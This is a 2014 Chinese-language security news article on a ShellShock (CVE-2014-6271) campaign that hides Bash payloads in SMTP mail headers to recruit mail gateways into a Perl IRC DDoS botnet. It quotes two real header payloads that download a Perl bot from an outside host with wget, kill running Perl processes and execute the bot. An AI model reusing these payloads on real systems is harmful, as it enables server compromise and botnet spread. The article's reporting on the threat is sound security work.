Bash破殼漏洞再變身:針對郵件服務器SMTP攻擊
責編:admin |2014-10-31 15:00:00Bash破殼漏洞(ShellShock,CVE-2014-6271)新的利用方法又來了!根據互聯網風暴中心( SANS InternetStorm Center )最新消息:破殼漏洞最新利用方法引發的新一輪攻擊正在醞釀中,這一次,破殼漏洞形成的僵尸網絡利用的是郵件服務器SMTP主機,目標是全球SMTP網關!
黑客們在試圖破壞SMTP系統
“嘿,我的老板啊,這次互聯網風暴意味著什么你造嗎?意味著我給你回郵件都是危險的!”(算了,我不回你了啊= =)
這次“破殼”利用的就是感染SMTP網關,試圖在MTAs / MDAs中尋找可利用弱點,然后攻擊者把惡意代碼隱藏在消息數據報頭中!
互聯網風暴中心描述了一個用Perl編寫的IRC DDoS Robot,其Payload擁有“獲取和執行遠程代碼的能力”。
下面一個圖片就是包含“破殼”有效載荷的初始郵件攻擊例子:
Bash破殼漏洞再變身:針對郵件服務器SMTP攻擊
二進制防御系統BDS(Binary Defense Systems)已經主動偵查到最新的攻擊細節。 那些已被破壞系統試圖通過破殼漏洞傳播僵尸網絡,并在每個主要頭字段使用“破殼”漏洞下載僵尸網絡腳本。攻擊者利用的字段有:“To:”字段、“From:”字段、 “Subject”字段、 “Date:”字段、 “Message ID:” 等等還有其他未發現字段
Message-ID:() { :; };wget -O /tmp/.legend hxxp://190-94-251-41/legend.txt;killall -9 perl;perl /tmp/.legend
References:() { :; };wget -O /tmp/.legend hxxp://190-94-251-41/legend.txt;killall -9 perl;perl /tmp/.legend
BDS還還透露:
“為了感染SMTP網關,并把它添加到現有僵尸網絡設備中去,有一個curl/wget/fetch/perl/lwp/etc的方法正在試圖從耶利哥安全團隊(Jericho Security Team)摧毀基于perl的僵尸網絡。”
自從九月初發現“破殼”起,彈震癥漏洞已經針對目標,在不同類型的設備上重復利用了許多次。許多安全專家也相繼發現了多次利用“破殼”漏洞攻擊全球設備的僵尸網絡,包括攻擊 VOIP系統 和利用競選傳播惡意軟件的混亂的僵尸網絡。
蜜罐由專家AlienVault實驗室檢測到試圖利用“破殼”漏洞的兩個不同惡意軟件樣本,消息披露至此不超過48小時。
9月底,火眼研究室(FireEye)也預言:“從惡意流量上觀察發現,試圖利用Bash bug的大規模網絡攻擊正在路上。”